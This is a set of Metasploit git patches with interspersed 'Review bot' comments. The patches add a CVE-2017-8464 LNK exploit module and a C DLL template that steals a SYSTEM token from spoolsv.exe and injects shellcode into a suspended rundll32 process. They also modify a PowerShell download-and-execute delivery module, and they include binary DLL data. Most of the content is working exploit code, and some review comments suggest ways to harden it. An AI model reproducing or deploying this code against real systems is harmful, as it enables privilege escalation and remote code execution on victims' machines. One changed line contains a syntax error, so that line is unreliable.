@@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 873185fd37..707f1ca524 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -149,7 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote if method.include? 'string' download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) - download_and_run = "#{ignore_cert}#{download_string}" else # Random filename to use, if there isn't anything set random = "#{rand_text_alphanumeric 8}.exe" @@ -164,13 +163,11 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#(unknown)')) # Generate download PowerShell command - #download_string = Rex::Powershell::PshMethods.download(url, "$z") # Can't use, due to single vs double quotes in the URL - download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^ - - # Join PowerShell commands up - download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z" + download_string = Rex::Powershell::PshMethods.download_run(url, file}) end + download_and_run = "#{ignore_cert}#{download_string}" + # Generate main PowerShell command return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', 
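Review bot: `download_string = Rex::Powershell::PshMethods.download_run(url, file})` has an unbalanced `}` and will not parse, so the module fails to load after this commit; the line should be `download_string = Rex::Powershell::PshMethods.download_run(url, file)`. Hoisting `download_and_run = "#{ignore_cert}#{download_string}"` below the `if` so each branch sets only `download_string` is a good simplification, but `file` is still built from `datastore['BinaryEXE-PATH']`/`'BinaryEXE-FILENAME'` while the registered advanced options are `PSHBinary-*`, so that mismatch survives the refactor. The gemspec bump to `< 0.1.78` presumably is what makes `download_run` available; a comment in the module naming the minimum rex-powershell version would help anyone bisecting.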
From 825ad940e666360c652609d9c34d711bd27b7a25 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 3 Oct 2017 09:49:24 -0400 Subject: [PATCH 014/254] Update the advanced option names and a typo --- .../fileformat/cve_2017_8464_lnk_rce.rb | 2 +- .../windows/local/cve_2017_8464_lnk_lpe.rb | 170 ++++++++++++++++++ 2 files changed, 171 insertions(+), 1 deletion(-) create mode 100644 modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index a91c80694e..252bb7f97e 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process' + 'EXITFUNC' => 'thread' }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb new file mode 100644 index 0000000000..6d2e32a57d --- /dev/null +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb 
@@ -0,0 +1,170 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'LNK Code Execution Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) + that contain a dynamic icon, loaded from a malicious DLL. + + This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is + similar except an additional SpecialFolderDataBlock is included. The folder ID set + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass + the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary + DLL file. + + If no PATH is specified, the module will use drive letters D through Z so the files + may be placed in the root path of a drive such as a shared VM folder or USB drive. 
+ }, + 'Author' => + [ + 'Uncredited', # vulnerability discovery + 'Yorick Koster', # msf module + 'Spencer McIntyre' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-8464'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], + ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup + ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format + ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'], + ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'WfsDelay' => 45, + }, + 'Arch' => [ARCH_X86, ARCH_X64], + 'Payload' => + { + 'Space' => 2048 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { 'Arch' => ARCH_ANY } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows x86', { 'Arch' => ARCH_X86 } ] + ], + 'DefaultTarget' => 0, # Default target is Automatic + 'DisclosureDate' => 'Jun 13 2017' + ) + ) + + register_options( + [ + OptString.new('FILENAME', [false, 'The LNK file']), + OptString.new('DLLNAME', [false, 'The DLL file containing the payload']), + OptString.new('PATH', [false, 'An explicit path to where the files should be written to']) + ] + ) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), + OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), + OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player']) + ] + ) + end + + def exploit + path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464') + arch = target['Arch'] == ARCH_ANY ? 
payload.arch.first : target['Arch'] + datastore['EXE::Path'] = path + datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") + + path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path.chomp!("\\") + + dll = generate_payload_dll + dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll" + dll_path = write_file("#{path}\\#{dll_name}", dll) + + lnk = generate_link("#{path}\\#{dll_name}") + lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk" + lnk_path = write_file("#{path}\\#{lnk_filename}", lnk) + end + + def generate_link(path) + vprint_status("Generating LNK file to load: #{path}") + path << "\x00" + display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name + comment = datastore['LNK_COMMENT'].dup << "\x00" + + # Control Panel Applet ItemID with our DLL + cpl_applet = [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00 + ].pack('C*') + cpl_applet << [path.length].pack('v') + cpl_applet << [display_name.length].pack('v') + cpl_applet << path.unpack('C*').pack('v*') + cpl_applet << display_name.unpack('C*').pack('v*') + cpl_applet << comment.unpack('C*').pack('v*') + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C + 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 + 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) + 0x00, 0x00, 0x00, 0x00, # FileAttributes + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime + 0x00, 0x00, 0x00, 0x00, # FileSize + 0x00, 0x00, 0x00, 0x00, # IconIndex + 0x00, 0x00, 0x00, 0x00, # ShowCommand + 0x00, 0x00, # HotKey + 0x00, 0x00, # Reserved1 + 0x00, 0x00, 0x00, 0x00, # Reserved2 + 0x00, 0x00, 0x00, 
0x00 # Reserved3 + ].pack('C*') + + # IDList + idlist_data = '' + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + # All Control Panel Items + 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [cpl_applet.length + 2].pack('v') + idlist_data << cpl_applet + idlist_data << [0x00].pack('v') # TerminalID + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData + # SpecialFolderDataBlock + ret << [ + 0x10, 0x00, 0x00, 0x00, # BlockSize + 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 + 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel) + 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList + ].pack('C*') + # TerminalBlock + ret << [0x00, 0x00, 0x00, 0x00].pack('V') + ret + end +end From d0ebfa195082e712049bd9fc018a17940b847630 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 3 Oct 2017 13:43:49 -0400 Subject: [PATCH 015/254] Change the template technicque to work as an LPE --- data/exploits/cve-2017-8464/src/build.sh | 2 + data/exploits/cve-2017-8464/src/template.c | 251 ++++++++++++++---- data/exploits/cve-2017-8464/src/template.h | 8 + .../cve-2017-8464/template_x64_windows.dll | Bin 19456 -> 21504 bytes .../cve-2017-8464/template_x86_windows.dll | Bin 14848 -> 17408 bytes .../windows/local/cve_2017_8464_lnk_lpe.rb | 14 +- 6 files changed, 222 insertions(+), 53 deletions(-) mode change 100755 => 100644 data/exploits/cve-2017-8464/template_x64_windows.dll mode change 100755 => 100644 data/exploits/cve-2017-8464/template_x86_windows.dll diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh index 878e3e3fa8..202daa5413 100755 --- a/data/exploits/cve-2017-8464/src/build.sh +++ b/data/exploits/cve-2017-8464/src/build.sh 
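Review bot: The description says that without `PATH` the module uses drive letters D through Z, but `exploit` falls back to `session.fs.file.expand_path("%TEMP%")`, so documentation and code disagree; update the description to state the %TEMP% fallback or implement what it describes. `path.chomp!("\\")` mutates the string returned by `datastore['PATH']` in place, and `datastore['EXE::Path']`/`'EXE::Template'` are written into the datastore to steer the EXE mixin — both deserve a comment, and the first should be `path = path.chomp("\\")`. `dll_path` and `lnk_path` are assigned but never read, and `[0x00, 0x00, 0x00, 0x00].pack('V')` emits only its first element (four zero bytes, the intended size by accident) — `[0].pack('V')` says what is meant. In `generate_link`, `display_name.unpack('C*').pack('v*')` widens bytes to UTF-16LE correctly only for ASCII; `LNK_DISPLAY_NAME` and `LNK_COMMENT` are operator-set strings, so `encode('UTF-16LE')` would handle non-ASCII values.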
@@ -8,8 +8,10 @@ ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll ${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll rm -f temp.dll *.o +chmod -x ../template_x64_windows.dll ${CCx86}-gcc -c -Os template.c -Wall -shared ${CCx86}-dllwrap --def template.def *.o -o temp.dll ${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll rm -f temp.dll *.o +chmod -x ../template_x86_windows.dll diff --git a/data/exploits/cve-2017-8464/src/template.c b/data/exploits/cve-2017-8464/src/template.c index 01553dc914..af8924e605 100644 --- a/data/exploits/cve-2017-8464/src/template.c +++ b/data/exploits/cve-2017-8464/src/template.c @@ -1,25 +1,17 @@ -// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll -// - removed ExitThread(0) to prevent an Explorer crash -// - added Mutex to prevent invoking payload multiple times (at least try) #include +#include +#include +#include +#include + #include "template.h" -void inline_bzero(void *p, size_t l) -{ - BYTE *q = (BYTE *)p; - size_t x = 0; - for (x = 0; x < l; x++) - *(q++) = 0x00; -} +void ExecutePayload(HANDLE hDll); -void ExecutePayload(void); - -BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) -{ - switch (dwReason) - { +BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + switch (dwReason) { case DLL_PROCESS_ATTACH: - ExecutePayload(); + ExecutePayload(hDll); break; case DLL_PROCESS_DETACH: 
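Review bot: The three-line header comment recording where `template.c` came from and why `ExitThread(0)` was removed and a mutex added is deleted, while the new code still derives from that template; keep a provenance note updated for the new design, e.g. `// Based on data/templates/src/pe/dll; ExitThread omitted (it crashed the host), cleanup is done by MonitorPayloadProcess`. The `#include` lines render without header names here, so I cannot check them — presumably a page artefact, but verify `tlhelp32.h` and `sddl.h` are included since `CreateToolhelp32Snapshot` and `ConvertStringSidToSid` are used below. `ExecutePayload(hDll)` is still invoked from `DLL_PROCESS_ATTACH`, i.e. under the loader lock; its body is outside this hunk, so confirm it only starts a thread there.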
@@ -31,65 +23,232 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) case DLL_THREAD_DETACH: break; } - return TRUE; } -void ExecutePayload(void) -{ +BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) { + int result; + + if (strlen(szStr) < strlen(szSuffix)) { + return FALSE; + } + if (bCaseSensitive) { + result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + else { + result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + return result == 0; +} + +BOOL GetProcessSid(HANDLE hProc, PSID *pSid) { + HANDLE hToken; + DWORD dwLength = 0; + TOKEN_USER *tuUser = NULL; + SIZE_T szSid = 0; + + *pSid = NULL; + do { + if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) { + return FALSE; + } + + GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength); + tuUser = (TOKEN_USER *)malloc(dwLength); + if (tuUser == NULL) { + break; + } + + if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) { + break; + } + + szSid = GetLengthSid(tuUser->User.Sid); + *pSid = LocalAlloc(LPTR, szSid); + if (*pSid == NULL) { + break; + } + + if (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid)) { + LocalFree(*pSid); + *pSid = NULL; + } + } while (FALSE); + + if (tuUser != NULL) { + free(tuUser); + } + if (hToken) { + CloseHandle(hToken); + } + + if (*pSid != NULL) { + return TRUE; + } + return FALSE; +} + +BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) { + PSID pTestSid = NULL; + PSID pTargetSid = NULL; + + if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) { + return FALSE; + } + + if (!GetProcessSid(hProc, &pTestSid)) { + LocalFree(pTargetSid); + return FALSE; + } + + *pbResult = EqualSid(pTestSid, pTargetSid); + LocalFree(pTargetSid); + LocalFree(pTestSid); + return TRUE; +} + +DWORD FindProcessId(LPCTSTR szProcessName) { + HANDLE hProcessSnap; + PROCESSENTRY32 pe32; + DWORD result = 0; + + hProcessSnap = 
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hProcessSnap == INVALID_HANDLE_VALUE) { + return 0; + } + + pe32.dwSize = sizeof(PROCESSENTRY32); + if (!Process32First(hProcessSnap, &pe32)) { + CloseHandle(hProcessSnap); + return 0; + } + + do { + if (!strcmp(szProcessName, pe32.szExeFile)) { + result = pe32.th32ProcessID; + break; + } + } while (Process32Next(hProcessSnap, &pe32)); + CloseHandle(hProcessSnap); + return result; +} + +HANDLE GetPayloadToken(void) { + HANDLE hTokenHandle = NULL; + HANDLE hProcessHandle = NULL; + BOOL bIsSystem = FALSE; + DWORD dwPid = 0; + CHAR Path[MAX_PATH + 1]; + + ZeroMemory(Path, sizeof(Path)); + GetModuleFileNameA(NULL, Path, MAX_PATH); + if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) { + return NULL; + } + /* loaded into the context of SearchProtocolHost.exe */ + + if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* and running as NT_AUTHORITY SYSTEM */ + + dwPid = FindProcessId("spoolsv.exe"); + if (!dwPid) { + return NULL; + } + + hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); + if (!hProcessHandle) { + return NULL; + } + + bIsSystem = FALSE; + if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */ + + OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle); + CloseHandle(hProcessHandle); + return hTokenHandle; +} + +DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) { + /* wait for the process to exit or 10 seconds before cleaning up */ + WaitForSingleObject(pExploitData->hProcess, 10000); + CloseHandle(pExploitData->hProcess); + CloseHandle(pExploitData->hMutex); + + /* this does not return */ + FreeLibraryAndExitThread(pExploitData->hModule, 0); + return 0; +} + +void ExecutePayload(HANDLE hDll) { PROCESS_INFORMATION pi; STARTUPINFO si; CONTEXT ctx; LPVOID ep; - 
HANDLE hMutex; SECURITY_ATTRIBUTES MutexAttributes; + SIZE_T dwBytesWritten = 0; + PEXPLOIT_DATA pExploitData = NULL; + HANDLE hToken; - inline_bzero(&MutexAttributes, sizeof(MutexAttributes)); + pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA)); + if (!pExploitData) { + return; + } + + /* keep a reference to the module for synchronization purposes */ + GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule)); + + ZeroMemory(&MutexAttributes, sizeof(MutexAttributes)); MutexAttributes.nLength = sizeof(MutexAttributes); MutexAttributes.bInheritHandle = TRUE; // inherit the handle - hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex"); - if(hMutex == NULL) - { + pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!"); + if (!pExploitData->hMutex) { return; } - if(GetLastError() == ERROR_ALREADY_EXISTS) - { - CloseHandle(hMutex); + if (GetLastError() == ERROR_ALREADY_EXISTS) { + CloseHandle(pExploitData->hMutex); return; } - if(GetLastError() == ERROR_ACCESS_DENIED) - { - CloseHandle(hMutex); + if (GetLastError() == ERROR_ACCESS_DENIED) { + CloseHandle(pExploitData->hMutex); return; } - // Start up the payload in a new process - inline_bzero(&si, sizeof(si)); + hToken = GetPayloadToken(); + + ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); - // Create a suspended process, write shellcode into stack, resume it - if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { - ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL; + /* start up the payload in a new process */ + if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { + ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL; GetThreadContext(pi.hThread, &ctx); - ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - 
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0); + WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten); + if (dwBytesWritten == SCSIZE) { #ifdef _WIN64 - ctx.Rip = (DWORD64)ep; + ctx.Rip = (DWORD64)ep; #else - ctx.Eip = (DWORD)ep; + ctx.Eip = (DWORD)ep; #endif - SetThreadContext(pi.hThread, &ctx); - ResumeThread(pi.hThread); + SetThreadContext(pi.hThread, &ctx); + ResumeThread(pi.hThread); - CloseHandle(pi.hThread); - CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + pExploitData->hProcess = pi.hProcess; + } } - CloseHandle(hMutex); + if (hToken) { + CloseHandle(hToken); + } + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL); } - diff --git a/data/exploits/cve-2017-8464/src/template.h b/data/exploits/cve-2017-8464/src/template.h index 7a674c3006..7181e46cba 100644 --- a/data/exploits/cve-2017-8464/src/template.h +++ b/data/exploits/cve-2017-8464/src/template.h @@ -1,3 +1,11 @@ #define SCSIZE 2048 unsigned char code[SCSIZE] = "PAYLOAD:"; +typedef struct { + HANDLE hModule; + HANDLE hMutex; + HANDLE hProcess; +} EXPLOIT_DATA, *PEXPLOIT_DATA; + +#define SIDSTR_SYSTEM _T("s-1-5-18") +#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult) 
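Review bot: In GetPayloadToken the second early return, `if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) { return NULL; }`, leaks hProcessHandle, and both SID checks treat a failed IsProcessRunningAsSystem call as if the process were SYSTEM because only the `&& !bIsSystem` branch bails out. Failing closed and releasing the handle is a two-line change, `if (!IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) || !bIsSystem) { CloseHandle(hProcessHandle); return NULL; }`, with the same inversion on the GetCurrentProcess() check. The OpenProcessToken return value is discarded as well, so a NULL hTokenHandle silently reaches CreateProcessAsUser in ExecutePayload; if that path intentionally relies on CreateProcessAsUser behaving like CreateProcess when hToken is NULL, a comment saying so would help. In ExecutePayload, when `dwBytesWritten != SCSIZE` the suspended rundll32 process and pi.hThread/pi.hProcess are neither terminated nor closed, and the early returns after CreateMutex leave pExploitData and the reference taken by GetModuleHandleEx unreleased, so the DLL stays pinned in the host process.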
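Review bot: SIDSTR_SYSTEM is declared with `_T("s-1-5-18")` while the code that consumes it is otherwise ANSI-only (`strcmp` against `pe32.szExeFile`, `GetModuleFileNameA`, narrow literals passed to CreateMutex and CreateProcessAsUser), so a build with UNICODE defined would break at the LPCTSTR boundary; build.sh does not define UNICODE, so the mismatch is latent rather than live. Dropping the wrapper, `#define SIDSTR_SYSTEM "s-1-5-18"`, keeps the header consistent with the .c file. The new EXPLOIT_DATA struct would also benefit from a one-line comment such as `/* state handed to MonitorPayloadProcess so it can close the handles and unload the DLL */`.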
diff --git a/data/exploits/cve-2017-8464/template_x64_windows.dll b/data/exploits/cve-2017-8464/template_x64_windows.dll old mode 100755 new mode 100644 index 40958f8986cbabb90b1e2174d1dcaa6eaa1fa83c..eda57c8d927d138f1786132d7d1324c704bb70c8 GIT binary patch literal 21504 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 